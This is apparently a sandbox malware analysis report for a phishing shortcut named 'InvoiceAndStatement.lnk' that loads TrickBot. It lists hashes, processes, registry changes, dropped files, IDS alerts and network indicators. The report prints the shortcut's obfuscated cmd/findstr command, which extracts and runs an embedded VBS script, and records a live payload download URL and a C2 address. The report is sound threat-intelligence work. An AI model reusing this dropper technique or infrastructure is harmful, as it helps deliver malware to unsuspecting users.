| File name: | InvoiceAndStatement.lnk |
| Full analysis: | https://app.any.run/tasks/c066e0e9-2a69-4927-9d24-11e2888ffbf9 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | September 25, 2019, 16:28:44 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=1, Archive, ctime=Sat Nov 22 00:44:59 2014, mtime=Sat Nov 22 00:44:59 2014, atime=Sat Nov 22 00:45:00 2014, length=357376, window=hidenormalshowminimized |
| MD5: | A1AF9D8EEADDF49B5ED2DF16866384C1 |
| SHA1: | 8DF0FB46F1B6B1DFBCC891A00B29FF08EC3F242B |
| SHA256: | 387682995C339DD34E1B7943D7BCB84A7C1A3B538FFA10CF5A1555361A40A0FD |
| SSDEEP: | 384:uYsZh7AL/AXbW+pkXVTLpcYDLCEXARvAbeL:jsZh0AX6+pklHpcYDLCEXARvAbeL |
MALICIOUS
Application was dropped or rewritten from another process
- ստանձնած.exe (PID: 2308)
- EZDKakDv.exe (PID: 1632)
- ստանձնած.exe (PID: 2540)
- ստանձնած.exe (PID: 1268)
Downloads executable files from IP
- WScript.exe (PID: 968)
Downloads executable files from the Internet
- WScript.exe (PID: 968)
Known privilege escalation attack
- DllHost.exe (PID: 4048)
Loads the Task Scheduler COM API
- ստանձնած.exe (PID: 2540)
- ստանձնած.exe (PID: 1268)
Connects to CnC server
- ստանձնած.exe (PID: 1268)
TRICKBOT was detected
- ստանձնած.exe (PID: 1268)
SUSPICIOUS
Executes scripts
- cmd.exe (PID: 3312)
Creates files in the program directory
- EZDKakDv.exe (PID: 1632)
Executable content was dropped or overwritten
- EZDKakDv.exe (PID: 1632)
- WScript.exe (PID: 968)
- ստանձնած.exe (PID: 2540)
Executed via COM
- DllHost.exe (PID: 4048)
Creates files in the user directory
- ստանձնած.exe (PID: 2540)
- ստանձնած.exe (PID: 1268)
Executed via Task Scheduler
- ստանձնած.exe (PID: 1268)
INFO
No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpString |
|---|---|
| FileAttributes: | Archive |
| CreateDate: | 2014:11:22 02:44:59+01:00 |
| AccessDate: | 2014:11:22 02:44:59+01:00 |
| ModifyDate: | 2014:11:22 02:45:00+01:00 |
| TargetFileSize: | 357376 |
| IconIndex: | 1 |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| TargetFileDOSName: | cmd.exe |
| DriveType: | Fixed Disk |
| VolumeLabel: | - |
| LocalBasePath: | C:\Windows\System32\cmd.exe |
| Description: | InvoiceAndStatement |
| RelativePath: | ..\..\..\..\Windows\System32\cmd.exe |
| CommandLineArguments: | /c del qEtLd & (f^indstr "RQIbN.*" InvoiceAndStatement.l^nk > "%tmp%\NcygF.vbs" & "%tmp%\NcygF.vbs") & WUIin |
| IconFileName: | %SystemRoot%\system32\SHELL32.dll |
| MachineID: | win-jbf0q9el659 |
Total processes
45
Monitored processes
8
Malicious processes
3
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 968 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\NcygF.vbs" | C:\Windows\System32\WScript.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 1268 | C:\Users\admin\AppData\Roaming\iCloud\ստանձնած.exe | C:\Users\admin\AppData\Roaming\iCloud\ստանձնած.exe | taskeng.exe | ||||||||||||
User: SYSTEM Integrity Level: SYSTEM Exit code: 0 Modules
| |||||||||||||||
| 1632 | C:\Users\admin\AppData\Local\Temp\EZDKakDv.exe | C:\Users\admin\AppData\Local\Temp\EZDKakDv.exe | WScript.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 2308 | "C:\ProgramData\ստանձնած.exe" | C:\ProgramData\ստանձնած.exe | — | EZDKakDv.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 2540 | "C:\ProgramData\ստանձնած.exe" | C:\ProgramData\ստանձնած.exe | DllHost.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 3312 | "C:\Windows\System32\cmd.exe" /c del qEtLd & (f^indstr "RQIbN.*" InvoiceAndStatement.l^nk > "C:\Users\admin\AppData\Local\Temp\NcygF.vbs" & "C:\Users\admin\AppData\Local\Temp\NcygF.vbs") & WUIin | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 4000 | findstr "RQIbN.*" InvoiceAndStatement.lnk | C:\Windows\system32\findstr.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 4048 | C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | C:\Windows\system32\DllHost.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: COM Surrogate Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
509
Read events
497
Write events
12
Delete events
0
Modification events
| (PID) Process: | (3312) cmd.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
| (PID) Process: | (3312) cmd.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 1 | |||
| (PID) Process: | (1632) EZDKakDv.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
| (PID) Process: | (1632) EZDKakDv.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 1 | |||
| (PID) Process: | (4048) DllHost.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
| (PID) Process: | (4048) DllHost.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 1 | |||
Executable files
3
Suspicious files
0
Text files
2
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1632 | EZDKakDv.exe | C:\ProgramData\ստանձնած.exe | executable | |
MD5:— | SHA256:— | |||
| 1268 | ստանձնած.exe | C:\Users\admin\AppData\Roaming\iCloud\settings.ini | text | |
MD5:— | SHA256:— | |||
| 2540 | ստանձնած.exe | C:\Users\admin\AppData\Roaming\iCloud\ստանձնած.exe | executable | |
MD5:— | SHA256:— | |||
| 968 | WScript.exe | C:\Users\admin\AppData\Local\Temp\EZDKakDv.exe | executable | |
MD5:— | SHA256:— | |||
| 3312 | cmd.exe | C:\Users\admin\AppData\Local\Temp\NcygF.vbs | text | |
MD5:D7A9CB467C88A3ABBC254EA7590834F1 | SHA256:32B761273568DC7E582C90B6181D556A2410016AF98F0E77D321C1BFB45B0A54 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
0
Threats
4
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
968 | WScript.exe | GET | 200 | 144.91.69.195:80 | http://144.91.69.195/solar.php | US | executable | 662 Kb | suspicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
968 | WScript.exe | 144.91.69.195:80 | — | Mills College | US | suspicious |
— | — | 31.184.253.37:443 | — | — | RU | malicious |
DNS requests
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
— | — | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
— | — | Misc activity | ET INFO EXE - Served Attached HTTP |
— | — | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 18 |